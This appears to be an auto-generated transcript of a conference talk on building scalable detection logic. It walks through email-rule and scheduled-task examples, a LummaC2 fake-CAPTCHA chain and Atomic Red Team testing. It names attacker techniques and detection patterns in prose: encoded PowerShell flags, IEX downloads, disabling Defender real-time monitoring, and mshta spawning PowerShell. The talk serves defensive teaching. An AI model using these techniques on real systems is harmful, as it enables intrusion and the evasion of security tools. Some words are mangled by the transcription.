
Welcome to Defections and Dragons. Uh, creating logic that fails. As a very large disclaimer, I've never played D and D. I don't really know what it is. I'm so sorry. A lot of these puns that we're going to have in here may be completely off. I know that there is something called a dungeon master. Maybe. Yes. And I know the game is very long and a lot of people played it through co but this session is all about the crack of building detection logic that doesn't just work once but stands the test of time uh as threats evolve as systems scale like any good quest there's the first one right we're facing some challenges along the way so we're going
to talk about messy uh detection patterns navigating confusing signals and forging rules that actually help our analysts with investigative leads not to overwhelm them. Uh whether you're a seasoned detection wizard, again, see playing off of that, uh or still earning your first log parsing spell, this session is meant to give you the tools, examples, and ideas to build detection logic that's smarter, stronger, and battle tested. I am Mac. Um I am a retired detection engineer. I have been in cyber security as a cyber security engineer since 2015. I want to say as of two months ago, I am now product manager. It's a very different world out there right now for me. And um as a fun fact, I run
marathons in my spare time. And I'm Rachel Schwock. I'm also a retired detection engineer. Um I was a detection engineer for several years at Rick Pener and recently moved over to be a sales engineer in the past four months. So I know I've got sales in my title. book doesn't make anybody leave. Uh, but also I did come up with the name because I was reading the fourth wave. So, I like dragons. I like dragon books and the best thing for detection logic to rhyme with was D&D themes. So, that's that's why we even made the theme, right? And dragons are cool. So, yeah, no complaints. All right. So, this is the agenda of what we're going to be talking about. We
have the dungeon of challenges. So what are hidden threats that can slip past our defenses? What are some challenges that we have while creating detection analytics? Then we have the arch of the blade. So what makes detection logic truly effective? We're going to go over like bad, better, best when it comes to detection analytics. What makes good detection analytics versus what's probably not going to work so well. Then we're going to look at spellbooks and strategy. So how do we build that lasting resilient logic? We're going to talk about principles, where to start, where do you go, what that process looks like. Which leads us into our battle map. So we're going to have a real world
example we'll take you through all the way until we give some example logic that you can implement within your own environment. And after that we're going to look at the training grounds and that is more of the testing and the validation and how can you do that? Why is it beneficial and never ending? So all right. So this slide highlights some of the most common and frustrating challenges that we encounter. So you have alert deja vu, right? Receiving the same alert repetitively. It's like being stuck in a loop over and over again. Many of us have been swamped by the same repeated alerts making it impossible to see what truly matters. It's a major drain on your focus and your resources
as a detection engineer or an analyst. Um it really sucks. Then we have um false quests, right? So receiving an alert that leads down a rabbit hole takes a significant amount of time. Basically like a misleading map. They're als critical threat. You spend a lot of time on them and they lead you to absolutely nothing and basically just divert all of your attention. Then we have the late reveal. It's like finding the dragon's slayer after it's already burnt down your village, right? It's the worst case scenario. It is detection logic that fails to identify threats before there's an actual impact. And finally, shiny object syndrome, right? That is focusing on logic and worrying about the newest zero day when you're
not really equipped to even handle the tried andrue methods of threat delivery and execution. We can sometimes get so focused on the latest, most sophisticated threats that we overlook attack methods that are really highly uh valid, effective, used, right? Because you're always wanting to focus on the coolest, newest thing to go over. These monsters represent the common pitfalls that can render our detection logic ineffective. So, we have to understand them to move forward and discuss how to forge better defenses. All right, so now we're turning our attention to the art of crafting truly quote unquote good detection logic. Think of it as forging a legendary spell, right? Just like a well doumented spell, our detection
logic has to be transparent and easy to understand. You don't want your analyst guessing what you were trying to uncover the whole time and what it's actually detecting on, right? Because that's really valid for someone who, let's say, specializes in endpoint and now is looking at a cloud detection analytic, right? You want them to be able to understand what that detection analyt was looking for in the first place. It also has to be reliable. Good detection logic accurately identifies threats without those false positives. It's precise. It's trustworthy. It's not a constant source of noise. And like a well-crafted spell, it should be resilient. Similarly, good detection logic minimizes the need for constant tweaking. You'll hear Rachel talk about
a rule of exclusions, right? You should only have maybe around five exclusions to every detection analytic. You don't want to continue having to do tweaks, exceptions. it's you need to focus on more strategic tasks. And finally, it has to be well scoped. So, kind of in that same realm. It's not broad. It's not an unargeted net. Is designed with a clear understanding of what it's looking for and what it's meant to detect and um it's achieving that goal effectively. All right. So, now I'm going to go over sharpening the blade. We're going to go over examples of bad, better, best of the detection world. So, example number one. Oh, I know part of that was cut
off. So, say you want to beef up your business email compromise detection logic. Okay. And I'm going to start with what I've historically found to be bad logic. A user created an email. All right. It is easy to read. I'll give it that. It it passes that check. Is it reliable, though? Is it really that rare for people to create email rules? I found it it it's not rare, you know, surprisingly. Uh there's a lot of people that are fanatics about email rules. Uh and you know, you might have a smaller environment where you can get away with there not being an email rule made daily, so it's not that big of a lift, but do you really want to see
every time somebody makes an email rule to move emails from the co-workers they don't like to the junk folder? I mean, maybe for a little bit, right? But it might start to wear on your analysts over time. Um, so let's narrow it down a little bit more. A user created an email rule to move emails to the archive folder. The archive folder isn't used a whole lot. And same goes for conversation history folder, RSS feeds folder. These are folders that you know their use may be somewhat but really you know you could count on it not being a daily occurrence. Adversaries know that these are folders that aren't viewed a lot so they are utilizing those folders to kind of
remain undetected by their victim. But still you're probably going to have to keep adding exclusions. There are people that you know even in this day and age they are using RSS feeds. It's surprising, I know. Um, the archive folder, too. So, I found the best logic, something that's really well scoped would be if you're also taking into account the email rule name. Adversaries, they like to really kind of name the rules unsuspectingly. You see like dot dot dot or an exclamation point or maybe a aaa, just something repetitive or just not well defined. And so creating an email rule name with maybe like one to three characters and an email rule was made to move items to the archive folder. That's
going to be your best thing for your book on trying to detect something evil with really high fidelity. Only thing you might have to exclude is like a o for out of office if somebody uses that. But this is one where every time I see this, I'm looking at it and I'm taking one of the work series. Next example I want to go over is going into process behavior scheduled task. They're a really good persistence mechanism, but they're also used legitimately by software admins. You know, backup jobs might use scheduled tasks. So it's definitely not something you want to receive an alert every time you see scheduled task running. That would get exhaustive. Better case would be if you
look at scheduled task with a command line that contains slashcreate. Kind of see it down there. So you're looking at times people make a scheduled task or maybe a new software is installed and it's creating a scheduled task. There's still going to be exclusions you have to keep up with. It's not going to be super quiet. So even better, you it's probably not going to be common that software is going to create a schedule task that makes a PowerShell script or a command prompt command run. So the best here would be if you have schedule task and slashcreate and I know you can't really see it but it's also if the command line contains cmd or
powershell your analyst would get this alert and they would be able to easily know what's going on a scheduled test was created and it's running who am I NL testdomain trust or something and they're going to be like oh why would that run repetitively that's an immediate indic indicator. They're not wasting their time figuring out what is this software, you know. Um, so that's your best bet for good logic there. All right, so now it's time to move from theory to practice. We're going to be diving into detection strategy, the overarching plan um, for how we build, how we deploy, how we maintain our defenses. This is where we're kind of moving beyond just like individual
threat actors and moving into just an overall approach to detection analytics. All right. So this is the MITER attack framework. Now that we're focused on our overall battle plan is this is going to be a critical tool for use. So instead of facing the unknown, right, we can leverage this globally recognized knowledge base to understand how attackers operate. It's not just a theoretical model. It's a practical guide, right? It gives us an understanding of the adversar's perspective. It maps out various stages of the attack life cycle, specific techniques at every stage and it even gives you examples, right? That way we can anticipate an attack or a threat after his coups. We can also prioritize
our detection efforts using this. The framework can help us focus on the most prevalent and impactful techniques that we're seeing, ensuring that you're just not chasing shadows. Uh we can also build a more targeted and effective logic. Instead of just writing generic rules, we can craft detection logic that focuses on a specific TTP, right? And you can focus that either on the initial access part of it all the way through the life cycle into reconnaissance, persistence, etc. Um and it also allows us to speak a common language, right? when you're trying to talk to other people in the industry or other teams, you can more reasonably explain like this is our coverage. This is where
we're covered. This is where we have gaps. And it helps us um kind of talk about our detection capabilities. In essence, the MITER attack framework empowers us to move from reactive to then proactive defense, threat hunting, detection, etc. By aligning our protection logic with this framework we're not discussing, we can then strategically build defenses against known attacks and techniques. All right, so we're going to start with choosing your detection strategy, right? Um, so fortify the gates earlier. This seems like a pretty reasonable concept, right? You want to catch it before any impact occurs. You want to catch it as early as possible during the initial stages of an attack before any major damage is caused,
right? Earlier detection means easier cleanup. Second, we have beware the most abused. This is about focusing on what attackers are actually using, right? Avoiding that shiny object syndrome. And then third, we have seek out the hidden weaknesses. for this part of the detection strategy is asking us to look in our own environment at our own history, right? Are you constantly dealing with the type same type of problem? Is it account compromise? Uh if that's that's okay, right? But maybe then you need to strengthen that area. You need to look at those types of techniques and tactics and create detection analytics over that like what is prevalent in your organization. In short, we need to think strategically
about when do we detect right initial access, persistence, etc. What attack methods do we prioritize for our industry and where our persistent weaknesses lie? We can make smarter choices about how to build detection logic and defend against the threats that pose the greatest risk to our organizations. All right, this slide. Oh, good. It's on there all the way. Perfect. There's two slides going to come up. This one, research technique abuse, and then we have another one. It's going to be an extension. You can take a picture of this because later on we'll have a resource page, but we could not list them all on there. So, it's a great um time to kind of take a picture
if you need to or you want to remember some things. Um but now that we've talked strategy, we want to talk about how can you actually learn your enemies move, your attackers move, right? The next two slides are res um resources for researching how attackers pull off their attacks, right? It's kind of like the reconnaissance of blue tea. It's that intelligence gathering phase. We've already talked about the MITER attack, right? Um it's not just a list, but for every technique, it's examples of how it's used, how to stop it, and how to detect it. It's just like our central intelligence database. Then depending on how you have an accent, I say LOL boss. Rachel says LOL vase. I just found that
all I wanted to. Honestly, I I always want to say LOL Bas. And you'll notice I like to like spell the whole thing out, but this is a great re uh great resources because it focuses on how attackers abuse normal Windows tools, things like PowerShell, which we're going to go into detail with our example. And by understanding how these everyday tools can be used maliciously, you then can obviously up your defenses against it. And then we will go into more detail about atomic red team. But an important phase is that testing and validation. Uh it's where things get hands-on right with this atomic red team. It gives us small testable examples that map directly to MITER
attack that we can run these tests in our environment and not only can we see if it's working, but we can also identify gaps where we need to strengthen our defenses. And then building on that research toolkit, we have detection.fy FYI and detect fyi. Think of these as your go-to blogs for the latest in threat detection, right? It's really indepth. It's engineering focused articles on how to build affection effective detections. It's a constant feed of practical knowledge from the detection community, from each and every one of your peers. And then we have this is where I say DFIR and Rachel says defer defer defer. Apparently, I like DFIR, but maybe that's text too much. But if you want to see realw world
attacks broken down step by step, think of this as like if you're on the front lines of the news, right? You get all of the indepth details of these attacks being played out in the wild. Uh and then finally, we have the Red Canary threat protection report. It comes out yearly. It's basically like all the top threats that we've seen over the past year. it's trending techniques, trending um threats and it gives you not only information on the execution but also it gives you at the very bottom actual the detection analytics that you can go and implement within your own environment and I think that's a pretty cool um resource to utilize. So now let's explore those
detection opportunities as the next phase. Think of it as scouting the battlefield for things in your own environment. So first we have choose your weapons wisely. This reminds us that the tools and logs that we use right our spell book really matters. We need to select the right data sources that are going to help us out. Then we have craft your strategy before we even start looking. We need a clear idea of what we're hunting for. What do you want to detect on? What specific threats are we trying to find? We need a well- definfined strategy to keep us focused. And then we have think like the guardians. Our detection logic is not just for machines, right? It's for our
analysts. It's for our detection engineers, our security engineers. We need to build detections that are actionable and very clear so that our dees whatever you call them within your own organization can actually have means to begin an investigation. And then fourth, we have survey the battleground. We need to know our own environment inside and out. Where are your critical assets? What where are their potential entry points for attackers? Where are those weaknesses? Understanding your environment helps then to continue on, figure out where you need to strengthen. And then finally, beware of false alarms. We need to start right away thinking of the obvious exclusions, things that we know are normal but might trigger on some of these detection
analytics. for our analysts or detection here sanity. Please do this. When we're exploring detection opportunities, we need to choose the right data, define what we're looking for, consider the analyst perspective, understand your environment, and then minimize noise. These are our guiding principles for that effective detection analytics. All right. Now, I'm going to go into an actual example. I wanted to choose PowerShell because PowerShell is tough. Um, it is used by admins and adversaries alike. So, this one can kind of be a beast to create coverage on, and I don't think you're actually ever done creating coverage on PowerShell. So, it's kind of an interesting one. So, why is PowerShell so beloved by admins and adversaries? Well, it's a
powerful tool. It's great for automation. It's native to Windows. There's a lot of scripts already out there for admins to use and it just makes their job really easy. Also makes adversaries jobs really easy. Uh so they really like it for the same reasons there. They can count on PowerShell being on every machine. They they love that it it's easy to obuscate commands and you know I mean it's not like it's really going to stand out. So you might see, oh, PowerShell is running, that might not raise a red flag where, you know, if they're having to rely on somebody downloading a random binary off the internet, that might raise a little bit more concern. So it
really helps them kind of lay low. They can also run fileless attacks. They can interact with the registry, add persistence that way. They can run payloads in memory as well. So the opportunities are really endless here. Uh, but like I said, PowerShell's tough. It's not something that you can say, "Hey, I want to be secure. I'm just going to block PowerShell. I'm only going to go super well." You You could try it. Let me know. Might might break some things, though, because Microsoft loves PowerShell. Um, but we're going to have to think about, okay, what can we differentiate malicious versus benign? What does malicious PowerShell look like? So, let's say we we did our research. We
use the the techniques in the blogs that Mac mentioned. And here's here's a few items we came back with. There's going to be another slide, too. There's there's several. Obuscated or encoded commands. This one's tough because admins use obuscation a lot. Just so, you know, they don't do worry about escape characters. So, B 64 is not malicious on its own. You can't just use that alone as an indicator. But the flag of tac encoded command um if it's shortened it's a little bit weirder. A lot of those admin scripts that are rebuilt it'll completely have the like whole tac encoded command spelled out. An adversary might use tac e or tac ec tac and c. So that's one indicator you can
kind of keep in your back pocket. Um, you'll still probably have to do a little bit of work for that one maybe depending on your environment, but that's a good one to start with. Suspicious network activity. So, PowerShell downloading payloads from the internet. Keep an eye out for the modules invoke web request, invoke expression, also known asex, or using net.web client. You can see HTTP usually and that command line as well. Well, that's also something that you can use to kind of narrow down malicious behavior. Using memory streams. This is another one. Um, PowerShell creates new objects with memory streams often used to decompress and execute payloads in memory. Uh, and you would see in the
command line though the new object io.mmemory stream. You might know not know exactly what's going on behind the scenes, but that in the command line will give you an idea that they're trying to run something in memory. Persistence PowerShell being used to create schedule task uh creating registry entries uh with regge ads. So look for those Windows run keys. That's that's pretty basic um for that activity there. Bypassing security controls. Oh, you could disable security tools. It's it's built in. It's really easy for attackers to look for that. And bypassing AMC. So, if you use set MP preference, disable real time monitoring and set that variable to true, that'll go ahead and let them bypass
defender. Unusual execution. So, PowerShell running from an unexpected parent process. Talk about this one a little bit more. So, MSHTA is a really good example of a process that shouldn't be spawning PowerShell. Let's talk about what threats are using PowerShell. Obviously, there's a ton. I couldn't I couldn't fit the whole list on the slide. Um, it's kind of never ending. It's a triedand- trueue method that people use, but a trending one that's really kind of interesting lately, Luma C2. I'll kind of dive into what that execution looks like, but it's a malware as a service stealer. It's capable of delivering additional payloads via .exe, DLL, R PowerShell. It's been seen a lot lately in fake cap
shell lures, which is what we're going to go over. It's a really interesting one. I I love it. Um, so goalish is another one that it leverages driveby downloads, masquerading as software updates. It'll usually send a person to a a browser update page. It's like, hey, you have to update Chrome right now to continue. And they'll download that file and it is not a browser update file. It will use PowerShell a lot for additional downloads or discovery commands. So, it's just a few here. Cobalt Strike, Empire, Powerloit, Mimi Cats is down there as well. You know, tried and true. Um, invoke Mimi Cats as a good PowerShell. Watch it. All right. Lumac2 execution. I know this I get I think it
all actually made it on this one. So cool. This is one example of it. Lumacy 2 can be delivered by a lot of different malware, but this is one I've seen a lot of recently. There a user will go to a fake capture page. Uh, you know, and captures they've gotten kind of ridiculous. You might have to solve a puzzle. you have to select a bicycle and a bus and like so people I get why this lure works they're tired of these matches and they're like whatever it takes right so it'll tell them you need to copy and paste this into your Windows run box and they'll do it they won't even really see the command like they try to
obuscate a little bit like it just it'll show that like capture verification that you'll see that's what they are going to look at when they press their pace to get in and they're going to hit enter and then it'll spawn msa. It'll reach out to that malicious page and then mhta will reach out to retrieve an encoded PowerShell script. That script will then pull down additional remote resources. Uh and in this example, it wrote it to the temp folder and then process injection occurs uh our DLL sideloading. And this is also kind of an interesting thing to try to detect because a lot of times process injection, one good way to look at that is if a process is running that doesn't
have a command line that it normally does and it'll be making network connections. So if there's also a process that doesn't normally make network connections to external resources and you start seeing it call out to all these random weird websites, that's a good sign of process injection. And it uses PowerShell a lot also as process injection. And that one is a good one I think because PowerShell can run a lot of times without a command line. So something to keep in mind, but this will occur and have direct expiltration to the C2. Okay. So we did our research. We picked out what does malicious look like? What threats are using it? Here are just a few detection ideas from
that. So we've got processes PowerShell and a command line that includes these shortened command switches. Attack NOP is no profile or it could have attack NI for non-interactive R invoke expression or IEX or IWR and that HTTP. So if it has any any of those plus the HTTP in there, a download is likely occurring. That would at least give your analyst a good starting point to then just be like, "Okay, well, what website is it downloading from?" And you're probably going to have to exclude Chocolatey because man, Chocolatey, that's how you download it. So, you know, couple exclusions right off the bat. I know there will be for that one. This other one, uh, the
command including the shortened encoded command. So tacky tacky in tacky and C and there are spaces before and after that. So you can actually see that it is uh the shortened version of encoded command. And then we've got MSHTA with a child process of PowerShell. Now is the time to refine your logic. run that those logic ideas through your environment and see if there's just a few things that need excluded right off the bat. If there are exclusions that are never ending, it's honestly not worth detecting. Or you need to find something else to add into that logic like maybe you have PowerShell and MSHDA for example. Maybe you need to add the fact that there is a network connection as
well. Just something to kind of more define that and narrow the scope is if you have an alert that you get every day when it does detect something, you will just disregard it. You're like, "Oh, this again, close them. That again, I don't care." So, focus on creating logic that has value because when it does try to tell you something, you're you're not going to care. Trust me, I' I've done it before too. And now we're going to go over testing with Atomic Red Team. So that's the website atomic redteam.io. This is a really valuable tool. What is it? It is an open-source library of test map to minor attack. The tests are very focused. They have
minimal dependencies. There's they're called atomics and they just have prerequisites. the actual test command and cleanup commands. It emulates common threat techniques and I really like that it's mapped to MITER and anyone can contribute to it. So there's a lot of tests because the whole security community has found this as a valuable resource and will continuously update it. Why use Atomic Red Team? Well, even taking a step back as a security analyst, you do trust that your tools and systems will alert you to various behaviors. And sometimes it feels like you're really having to blindly trust them. It's a common experience and one I've had where you fully expect that like, oh yeah, that tool, it'll it'll
block that. It'll it'll alert me at least, right? And then it doesn't. And you find out way later when it cut a lot worse and you're like, "What the heck?" You know what happened here? I I thought this was like sworn to be like, "Yeah, could we catch that?" Okay. Well, this is one way that you can really test in real time. Would I see this? Would my tool detect it? Is it am I going to get any alerts at all? So that way you're kind of setting yourself up for success if you know like if you're able to imitate the bad guy before the bad guy can do it in your environment. It's it's the best case
scenario if you just go ahead and run some tests. But it also makes sure that the detection logic that you made doesn't have typos. It's working how you expected because you know it happens where you might you might think it's going to work one way. You run a test and it didn't fire. Go back and figure it out. Uh it also can help you create detection logic. So say you just go to atomic red team, you look at the various techniques, go to one, read about, you know, it'll tell you why is this test doing this? Um and you can evaluate your coverage coverage gaps with those tests. And it's also a really good learning
tool. It lets anyone, you know, learn why would an adversary do this? What would they do? you know, it it really helps you get that attacker mindset, and I think that really levels you up as a defender. There's multiple paths that you can use to get started with Atomic Red Team. It's really easy. I mean, you can run tests on a technique by technique basis. Um, you know, it's really useful when you're making dete detection logic that ties to a specific technique. Go through and you can run those tests. You can also find a specific threat you want to emulate and pick out tests that have the same techniques throughout. So like how I mentioned Luma C2, you can go through
and pick out, okay, let me go to MSHTA, let me go to PowerShell and run the different tests associated with those. And you can also decide, do you want to just manually paste and run those in? Um, or you can also use invoke atomic red team. It's a PowerShell module. Hey, PowerShell again. Yeah. uh and it'll run those tests automatically. Uh so you can type in the Mocha Atomic Red team. They got the technique and it'll it'll run all those tests associated with the technique. So going back to our PowerShell example, uh I did have to modify the test a bit so they fit on my slides. So use that, you know, as an example. Modify tests to fit your needs
that are on atomic red team. You don't have to use exactly what they put. that first one. So invoke expression and a download. So we got PowerShell running calling the net.web client and calling out to this example. That's a good indicator of a attempted download. That's a good test to run that be harmless. Then you got the TAC EC flag to run hello world. But we got PowerShell tag no profile tag EC and some B 64. Another harmless test to run. And then we've got MSHTA spawning PowerShell. This one kind of lengthy, but it's got MSHTA that will end up using BBScript WScript to run PowerShell. That'll write hello MSHTA. works. These tests um use them for
whatever detection logic take it out as an example on atomic red team. How to modify tests to fit your needs. All right. And now for another part another crucial step putting that logic to the test writing. Um as we mentioned atomic routine is great. We need to ask ourselves key questions after any test. First you need to ask yourself what triggered. Review the alerts, the logs, the telemetry generated. What do you see? We need to meticulously review the alerts to see was our logic the source of the signal. Did anything else unexpectingly fire that now we need to go and evaluate. Then you need to ask is it what you expected? Did our detection logic behave
the way that you intended? And did it catch the right behavior? Did it miss it? Do we need to go in and do more? Were there any surprises? Did you notice? Okay, we saw this part of the life cycle, this part of the execution chain, but we missed this part. We need to somehow raise that telemetry up in case it's the attack is performed in a different way, right? Because most of the thread actors that we see are performing similar aspects of attacks, right? similar methods of persistence or recon, but we want to have multiple detection analytics along the way to make sure that we're not missing any part of that. And third, we need to
identify new ideas or improvements. Did our testing reveal any alternative attacker behaviors that now we need to cover? Are there any refinements that we need to make? Right? Additional tuning, better filtering, logic expansion to make our detection analytics even more effective. And then the very pivotal part of this whole entire thing is that rinse and repeat. Testing isn't a one-time thing. We need to adjust our logic and our thresholds based on our findings, then retest with slight variations, scenarios, and keep iterating until our detection logic is reliable and ready to scale. So in the training grounds, we're constantly asking what happened, was it right, and how can we make it better? This iterative process of testing and
refinement is essential for building truly robust detection logic. All right. And then these, if you're taking away anything, these are our three key takeaways from this talk. Scaling starts with intentional design. Good detection logic is not just clever. It's clear. It's testable. It's built with context in mind. Right? We want to give our analysts or whoever is reviewing the alerts or events that come up with us means to begin an investigation. Clear actionable ability to respond to what your detection logic is bubbling up to the surface. Second, balance precision and coverage like a true dungeon master. Again, knowing I have absolutely no idea what that is in D and D, but you want to avoid the trap
of overfitting or over alerting. know your environment specifically. What are your users typically doing? What's normal? What's not normal? Detection quality isn't about catching just the bad stuff. It's about catching what matters, right? What will you be able to use to mitigate, to respond, to act. And finally, test like a threat actor and review like an analyst. Validation is your best feedback loop. Don't just ask, "Did my detection logic fire?" ask, "Did it teach me anything about what's going on in my environment or how threat actors are operating?" Every round of testing is an opportunity to then refine your detection logic and make it bigger and better and continue making sure that we're catching it
early. And finally, again, like I said, this is not a full list of the resources that we gave you, um, but it is some of them. red canary threat detection report that's already out for the year and that'll give you a lot of detection analytics that you can then like tailor to whatever sim tools you're using in your own environment again with like more details on the execution chain and all of that atomic red team write the test the lowass project and then miter attack framework but all right we have time for questions if anyone has any yes is there a specific TTP that time scaling is There are specific TTP that we had a hard time scaling.
There are I mean there there are actually ones that we we don't have coverage for. Um let me go to the map actually. No, no, that's a good question. I mean there are some that just like the false positives like Rachel kind of stated and it's like you just can't work around them. Yeah. Yeah. Um, I get really close. You know, I feel like when that would be hard. So, I guess where where I would have a hard time. So, we really focus a lot on the behaviors after an attack started. Um, so like if if you're talking about like exploit a public facing application, I wouldn't have a lot of insight until after the
exploitation occurred. So that's one that I I definitely have found challenging um with like ADR data that I usually am basing my detectors off of. Any other questions?
All right. All right. Well, thank you.